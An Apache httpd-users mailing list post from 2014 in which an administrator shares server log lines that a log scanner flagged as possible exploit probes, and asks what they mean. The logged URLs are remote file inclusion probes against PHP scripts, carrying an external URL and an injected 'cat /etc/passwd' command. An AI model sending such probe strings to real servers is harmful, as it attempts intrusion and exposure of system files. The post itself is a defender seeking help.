httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Knute Johnson <apa...@knutejohnson.com>
Subject [users@httpd] Possible exploit?
Date Wed, 12 Feb 2014 15:58:16 GMT
I found the following in my log this morning.  Does anybody know what it 
really means?  Thanks.

  A total of 3 possible successful probes were detected (the following URLs
  contain strings that match one or more of a listing of strings that
  indicate a possible exploit):


/user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd

HTTP Response 302

/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? 
HTTP Response 302

/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd

HTTP Response 302


-- 

Knute Johnson

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message